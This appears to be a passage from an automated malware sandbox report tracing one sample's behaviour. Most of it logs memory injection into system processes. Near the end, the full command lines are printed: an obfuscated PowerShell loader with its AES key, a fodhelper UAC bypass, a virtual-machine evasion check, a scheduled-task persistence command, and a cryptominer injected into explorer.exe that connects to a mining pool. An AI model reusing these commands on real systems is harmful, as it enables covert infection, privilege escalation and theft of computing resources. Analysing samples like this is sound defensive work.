        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: B00000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 7B0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 11B0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 720000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 740000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: D00000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1350000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9C0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 11D0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 700000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 840000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1190000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 960000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9F0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 500000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: BE0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: E30000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13C0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: CA0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1460000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 750000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 6C0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1130000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: A10000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 7C0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1250000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1170000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: C20000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 7D0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9D0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 510000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 620000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: C40000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 590000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 510000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1C0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: CF0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: F60000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 7E0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13B0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13F0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: E40000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 3C0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 700000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1150000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: DF0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1050000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: BC0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1420000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9A0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: DC0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9D0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: E00000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1230000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: CF0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 590000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1090000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: ED0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: CA0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 3B0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1040000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: AD0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: BD0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 700000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 730000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1220000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9F0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: FA0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1330000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 780000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 280C22F0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1FB970000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 25EE91B0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1AD31C90000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 226AD1B0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 138D43C0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 236C6DC0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: CD0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 15829E70000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1D643A60000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1CDEB370000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22F41AD0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 20631820000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 19C5BA20000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1DE98F00000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1CCE3640000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1858EA10000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 228C25A0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2942EBE0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 23D96450000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1C8A0380000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 26D9F390000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1E5EF030000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 248D2920000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 21C0EE50000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E43B8A0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E43BA00000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 165EDA50000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 201B5250000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 201B5250000
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\b.bat" "Jump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess created: C:\Users\user\AppData\Local\Temp\paint.exe "C:\Users\user\AppData\Local\Temp\paint.exe" Jump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess created: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe "C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 'C:\Users\user\AppData\Local\Temp\b.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] ('')); Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\paint.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\paint.exe"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe C:\Windows\System32\fodhelper.exeJump to behavior
        Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" Jump to behavior
        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"Jump to behavior
        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\services64.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\services64.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"Jump to behavior
        Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe" Jump to behavior
        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZW7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-stealth Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
